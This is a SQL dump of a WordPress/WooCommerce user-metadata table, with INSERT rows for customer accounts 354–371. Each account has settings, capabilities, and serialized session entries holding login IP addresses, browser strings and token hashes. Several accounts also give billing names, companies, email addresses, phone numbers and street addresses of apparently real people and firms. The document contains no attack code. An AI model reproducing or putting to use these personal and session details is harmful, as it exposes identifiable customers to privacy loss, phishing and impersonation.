INSERT INTO `wp_usermeta` VALUES (6082, 354, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6083, 354, '_yoast_wpseo_profile_updated', '1484699945'); 
INSERT INTO `wp_usermeta` VALUES (6084, 354, 'session_tokens', 'a:1:{s:64:"ebe2f71724259976a0a20a482d6e9eaee1e0e915e9c2a55500b103744ba87c0a";a:4:{s:10:"expiration";i:1485909546;s:2:"ip";s:13:"70.213.14.254";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1484699946;}}'); 
INSERT INTO `wp_usermeta` VALUES (6085, 354, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (6086, 355, 'nickname', 'acooper'); 
INSERT INTO `wp_usermeta` VALUES (6087, 355, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6088, 355, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6089, 355, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6090, 355, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6091, 355, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6092, 355, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6093, 355, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6094, 355, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6095, 355, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6096, 355, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6097, 355, '_yoast_wpseo_profile_updated', '1484730399'); 
INSERT INTO `wp_usermeta` VALUES (6098, 355, 'session_tokens', 'a:1:{s:64:"921cb4b0ffc7a7b0a1f92304f5a4cb7c1aca259dfb76ea909669ce6c06c0beee";a:4:{s:10:"expiration";i:1485940000;s:2:"ip";s:12:"182.71.39.42";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36";s:5:"login";i:1484730400;}}'); 
INSERT INTO `wp_usermeta` VALUES (6099, 356, 'nickname', 'kelly.l.mitchell'); 
INSERT INTO `wp_usermeta` VALUES (6100, 356, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6101, 356, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6102, 356, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6103, 356, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6104, 356, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6105, 356, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6106, 356, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6107, 356, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6108, 356, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6109, 356, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6110, 356, '_yoast_wpseo_profile_updated', '1484755268'); 
INSERT INTO `wp_usermeta` VALUES (6111, 356, 'session_tokens', 'a:1:{s:64:"4989d4754f43ae01cbd986037083f26dec6268ae8b980c590aa2fbce46d0f60a";a:4:{s:10:"expiration";i:1485964869;s:2:"ip";s:13:"192.91.171.36";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484755269;}}'); 
INSERT INTO `wp_usermeta` VALUES (6112, 357, 'nickname', 'purchasing2'); 
INSERT INTO `wp_usermeta` VALUES (6113, 357, 'first_name', 'Cindy'); 
INSERT INTO `wp_usermeta` VALUES (6114, 357, 'last_name', 'Thelemann'); 
INSERT INTO `wp_usermeta` VALUES (6115, 357, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6116, 357, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6117, 357, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6118, 357, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6119, 357, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6120, 357, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6121, 357, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6122, 357, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6123, 357, '_yoast_wpseo_profile_updated', '1484760167'); 
INSERT INTO `wp_usermeta` VALUES (6124, 357, 'session_tokens', 'a:1:{s:64:"2078d91403bed3622d5deefabf3c7b9aa08b4a22ad50e8d1f4f39a1cd9518cdd";a:4:{s:10:"expiration";i:1485969768;s:2:"ip";s:15:"216.114.200.242";s:2:"ua";s:76:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko";s:5:"login";i:1484760168;}}'); 
INSERT INTO `wp_usermeta` VALUES (6125, 357, 'billing_first_name', 'Cindy'); 
INSERT INTO `wp_usermeta` VALUES (6126, 357, 'billing_last_name', 'Thelemann'); 
INSERT INTO `wp_usermeta` VALUES (6127, 357, 'billing_company', 'Thin Film Technology Corp'); 
INSERT INTO `wp_usermeta` VALUES (6128, 357, 'billing_email', 'purchasing@thin-film.com'); 
INSERT INTO `wp_usermeta` VALUES (6129, 357, 'billing_phone', '507-625-8445'); 
INSERT INTO `wp_usermeta` VALUES (6130, 357, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (6131, 357, 'billing_address_1', '1980 Commerce Drive'); 
INSERT INTO `wp_usermeta` VALUES (6132, 357, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (6133, 357, 'billing_city', 'North Mankato'); 
INSERT INTO `wp_usermeta` VALUES (6134, 357, 'billing_state', 'MN'); 
INSERT INTO `wp_usermeta` VALUES (6135, 357, 'billing_postcode', '56003'); 
INSERT INTO `wp_usermeta` VALUES (6136, 357, 'last_update', '1484760284'); 
INSERT INTO `wp_usermeta` VALUES (6137, 357, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (6138, 358, 'nickname', 'rroberts'); 
INSERT INTO `wp_usermeta` VALUES (6139, 358, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6140, 358, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6141, 358, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6142, 358, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6143, 358, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6144, 358, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6145, 358, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6146, 358, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6147, 358, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6148, 358, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6149, 358, '_yoast_wpseo_profile_updated', '1484765729'); 
INSERT INTO `wp_usermeta` VALUES (6150, 358, 'session_tokens', 'a:1:{s:64:"a03d333def85a9f481d0d026b969d65f398df3d98f89c88627cd22b1baa59c77";a:4:{s:10:"expiration";i:1485975330;s:2:"ip";s:13:"38.140.216.10";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484765730;}}'); 
INSERT INTO `wp_usermeta` VALUES (6151, 359, 'nickname', 'rfourquet'); 
INSERT INTO `wp_usermeta` VALUES (6152, 359, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6153, 359, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6154, 359, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6155, 359, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6156, 359, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6157, 359, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6158, 359, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6159, 359, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6160, 359, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6161, 359, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6162, 359, '_yoast_wpseo_profile_updated', '1484786944'); 
INSERT INTO `wp_usermeta` VALUES (6163, 359, 'session_tokens', 'a:1:{s:64:"c554ae2360750ec50318ff90d2087dfcaa72c8b8458748c1b1b96566461a1a58";a:4:{s:10:"expiration";i:1485996546;s:2:"ip";s:13:"69.27.229.128";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484786946;}}'); 
INSERT INTO `wp_usermeta` VALUES (6164, 360, 'nickname', 'Rebecca.Vickers'); 
INSERT INTO `wp_usermeta` VALUES (6165, 360, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6166, 360, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6167, 360, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6168, 360, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6169, 360, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6170, 360, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6171, 360, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6172, 360, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6173, 360, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6174, 360, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6175, 360, '_yoast_wpseo_profile_updated', '1484835005'); 
INSERT INTO `wp_usermeta` VALUES (6176, 360, 'session_tokens', 'a:1:{s:64:"d62739685ddbc44b09ca9b65afe1dae91d670197d0e2d3626f60844ab9504403";a:4:{s:10:"expiration";i:1486044606;s:2:"ip";s:13:"81.128.137.82";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484835006;}}'); 
INSERT INTO `wp_usermeta` VALUES (6177, 361, 'nickname', 'mjoyner'); 
INSERT INTO `wp_usermeta` VALUES (6178, 361, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6179, 361, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6180, 361, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6181, 361, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6182, 361, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6183, 361, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6184, 361, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6185, 361, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6186, 361, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6187, 361, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6188, 361, '_yoast_wpseo_profile_updated', '1484839020'); 
INSERT INTO `wp_usermeta` VALUES (6189, 361, 'session_tokens', 'a:1:{s:64:"9dd1cc5f7930f8453fa0ed907ecb9ae0689f36ffd4d78c3264abd9f17a45d375";a:4:{s:10:"expiration";i:1503586499;s:2:"ip";s:13:"198.0.163.155";s:2:"ua";s:69:"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1503413699;}}'); 
INSERT INTO `wp_usermeta` VALUES (6190, 361, 'billing_first_name', 'Matthew'); 
INSERT INTO `wp_usermeta` VALUES (6191, 361, 'billing_last_name', 'Joyner'); 
INSERT INTO `wp_usermeta` VALUES (6192, 361, 'billing_company', 'Miller-Stephenson Chemical'); 
INSERT INTO `wp_usermeta` VALUES (6193, 361, 'billing_email', 'mjoyner@mschem.com'); 
INSERT INTO `wp_usermeta` VALUES (6194, 361, 'billing_phone', '203-743-4447'); 
INSERT INTO `wp_usermeta` VALUES (6195, 361, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (6196, 361, 'billing_address_1', '55 Backus Avenue'); 
INSERT INTO `wp_usermeta` VALUES (6197, 361, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (6198, 361, 'billing_city', 'Danbury'); 
INSERT INTO `wp_usermeta` VALUES (6199, 361, 'billing_state', 'CT'); 
INSERT INTO `wp_usermeta` VALUES (6200, 361, 'billing_postcode', '06810'); 
INSERT INTO `wp_usermeta` VALUES (6201, 362, 'nickname', 'davey'); 
INSERT INTO `wp_usermeta` VALUES (6202, 362, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6203, 362, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6204, 362, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6205, 362, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6206, 362, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6207, 362, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6208, 362, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6209, 362, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6210, 362, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6211, 362, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6212, 362, '_yoast_wpseo_profile_updated', '1484843175'); 
INSERT INTO `wp_usermeta` VALUES (6213, 362, 'session_tokens', 'a:1:{s:64:"84ec540d99803ec6cb0b4595819b6d48690c51b5f379d69ea32ae847ee6cc5c4";a:4:{s:10:"expiration";i:1486052776;s:2:"ip";s:14:"104.129.194.80";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36";s:5:"login";i:1484843176;}}'); 
INSERT INTO `wp_usermeta` VALUES (6214, 363, 'nickname', 'palmerj'); 
INSERT INTO `wp_usermeta` VALUES (6215, 363, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6216, 363, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6217, 363, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6218, 363, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6219, 363, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6220, 363, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6221, 363, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6222, 363, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6223, 363, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6224, 363, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6225, 363, '_yoast_wpseo_profile_updated', '1484843211'); 
INSERT INTO `wp_usermeta` VALUES (6226, 363, 'session_tokens', 'a:1:{s:64:"d7066ea18a6c01024c6478de4f87dba6ab4920bbb175d04a17282d3de66e0d29";a:4:{s:10:"expiration";i:1488434034;s:2:"ip";s:15:"108.171.133.171";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1488261234;}}'); 
INSERT INTO `wp_usermeta` VALUES (6227, 364, 'nickname', 'alex'); 
INSERT INTO `wp_usermeta` VALUES (6228, 364, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6229, 364, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6230, 364, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6231, 364, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6232, 364, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6233, 364, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6234, 364, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6235, 364, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6236, 364, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6237, 364, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6238, 364, '_yoast_wpseo_profile_updated', '1484851210'); 
INSERT INTO `wp_usermeta` VALUES (6239, 364, 'session_tokens', 'a:1:{s:64:"1fc7bb40fc433fe7428b6b9ca1c900f6b154d5ee8d353b6929c173b2e707be95";a:4:{s:10:"expiration";i:1486060811;s:2:"ip";s:12:"216.115.3.58";s:2:"ua";s:119:"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12";s:5:"login";i:1484851211;}}'); 
INSERT INTO `wp_usermeta` VALUES (6240, 364, 'billing_first_name', 'Alex'); 
INSERT INTO `wp_usermeta` VALUES (6241, 364, 'billing_last_name', 'LUkacs'); 
INSERT INTO `wp_usermeta` VALUES (6242, 364, 'billing_company', 'NIC Industries'); 
INSERT INTO `wp_usermeta` VALUES (6243, 364, 'billing_email', 'alex@nicindustries.com'); 
INSERT INTO `wp_usermeta` VALUES (6244, 364, 'billing_phone', '541-826-1922'); 
INSERT INTO `wp_usermeta` VALUES (6245, 364, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (6246, 364, 'billing_address_1', '7050 Sixth Street'); 
INSERT INTO `wp_usermeta` VALUES (6247, 364, 'billing_address_2', ''); 
INSERT INTO `wp_usermeta` VALUES (6248, 364, 'billing_city', 'White City'); 
INSERT INTO `wp_usermeta` VALUES (6249, 364, 'billing_state', 'OR'); 
INSERT INTO `wp_usermeta` VALUES (6250, 364, 'billing_postcode', '97503'); 
INSERT INTO `wp_usermeta` VALUES (6251, 365, 'nickname', 'Luisa.Davis'); 
INSERT INTO `wp_usermeta` VALUES (6252, 365, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6253, 365, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6254, 365, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6255, 365, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6256, 365, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6257, 365, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6258, 365, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6259, 365, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6260, 365, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6261, 365, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6262, 365, '_yoast_wpseo_profile_updated', '1484870047'); 
INSERT INTO `wp_usermeta` VALUES (6263, 365, 'session_tokens', 'a:1:{s:64:"363c2cb9fcb65892468c79701ea39493b6c6bf2a0c93d22bbff7eb39da1c06ed";a:4:{s:10:"expiration";i:1486079648;s:2:"ip";s:11:"142.79.57.1";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484870048;}}'); 
INSERT INTO `wp_usermeta` VALUES (6264, 366, 'nickname', 'shiva.kordj'); 
INSERT INTO `wp_usermeta` VALUES (6265, 366, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6266, 366, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6267, 366, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6268, 366, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6269, 366, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6270, 366, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6271, 366, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6272, 366, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6273, 366, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6274, 366, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6275, 366, '_yoast_wpseo_profile_updated', '1484870533'); 
INSERT INTO `wp_usermeta` VALUES (6276, 366, 'session_tokens', 'a:1:{s:64:"27c74cc12c9cb979f76e06fdec70ff7fc5deae72725ab3a49378ea2463e3d9e9";a:4:{s:10:"expiration";i:1486080134;s:2:"ip";s:12:"67.68.87.213";s:2:"ua";s:118:"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17";s:5:"login";i:1484870534;}}'); 
INSERT INTO `wp_usermeta` VALUES (6277, 367, 'nickname', 'stefano.bartolucci'); 
INSERT INTO `wp_usermeta` VALUES (6278, 367, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6279, 367, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6280, 367, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6281, 367, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6282, 367, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6283, 367, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6284, 367, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6285, 367, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6286, 367, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6287, 367, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6288, 367, '_yoast_wpseo_profile_updated', '1484903267'); 
INSERT INTO `wp_usermeta` VALUES (6289, 367, 'session_tokens', 'a:1:{s:64:"4ecb6c99a596f9dfe319ab9555b8bcea60d1108a6bc702a0d6517eb268bf9ddc";a:4:{s:10:"expiration";i:1486112868;s:2:"ip";s:13:"100.45.36.170";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36";s:5:"login";i:1484903268;}}'); 
INSERT INTO `wp_usermeta` VALUES (6290, 368, 'nickname', 'computer.delight'); 
INSERT INTO `wp_usermeta` VALUES (6291, 368, 'first_name', 'Sheidu'); 
INSERT INTO `wp_usermeta` VALUES (6292, 368, 'last_name', 'Joseph'); 
INSERT INTO `wp_usermeta` VALUES (6293, 368, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6294, 368, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6295, 368, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6296, 368, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6297, 368, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6298, 368, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6299, 368, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6300, 368, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6301, 368, '_yoast_wpseo_profile_updated', '1484927043'); 
INSERT INTO `wp_usermeta` VALUES (6302, 368, 'session_tokens', 'a:2:{s:64:"7c6e2b56c5c9aaf1603ee9ba7a009a38bb2046c2265ea5c3f6c73b0aec87d3ca";a:4:{s:10:"expiration";i:1486136644;s:2:"ip";s:13:"105.112.3.226";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0";s:5:"login";i:1484927044;}s:64:"86b36e26f9a47bb2f8dee5512aa485550b5d47c0cc2328279bd7284ed97f2b2c";a:4:{s:10:"expiration";i:1486136833;s:2:"ip";s:13:"105.112.3.226";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0";s:5:"login";i:1484927233;}}'); 
INSERT INTO `wp_usermeta` VALUES (6303, 368, 'last_update', '1484927232'); 
INSERT INTO `wp_usermeta` VALUES (6304, 369, 'nickname', 'gcatalan'); 
INSERT INTO `wp_usermeta` VALUES (6305, 369, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6306, 369, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6307, 369, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6308, 369, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6309, 369, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6310, 369, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6311, 369, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6312, 369, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6313, 369, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6314, 369, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6315, 369, '_yoast_wpseo_profile_updated', '1484928867'); 
INSERT INTO `wp_usermeta` VALUES (6316, 369, 'session_tokens', 'a:1:{s:64:"ce6ae8a916437222a2146f26a751938f1124ca0a2b28ea5c346af561a5bb5726";a:4:{s:10:"expiration";i:1486138492;s:2:"ip";s:14:"216.236.53.146";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484928892;}}'); 
INSERT INTO `wp_usermeta` VALUES (6317, 370, 'nickname', 'michael.a.jeffers14.ctr'); 
INSERT INTO `wp_usermeta` VALUES (6318, 370, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6319, 370, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6320, 370, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6321, 370, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6322, 370, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6323, 370, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6324, 370, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6325, 370, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6326, 370, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6327, 370, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6328, 370, '_yoast_wpseo_profile_updated', '1484929631'); 
INSERT INTO `wp_usermeta` VALUES (6330, 370, 'session_tokens', 'a:1:{s:64:"801549c7341f103337333d050442fbcca3db07cec6a1f880a8de4caadafd20b3";a:4:{s:10:"expiration";i:1485102579;s:2:"ip";s:12:"137.242.1.64";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1484929779;}}'); 
INSERT INTO `wp_usermeta` VALUES (6331, 371, 'nickname', 'rfeeney'); 
INSERT INTO `wp_usermeta` VALUES (6332, 371, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6333, 371, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (6334, 371, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (6335, 371, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6336, 371, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (6337, 371, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (6338, 371, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (6339, 371, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (6340, 371, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (6341, 371, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (6342, 371, '_yoast_wpseo_profile_updated', '1484947012'); 
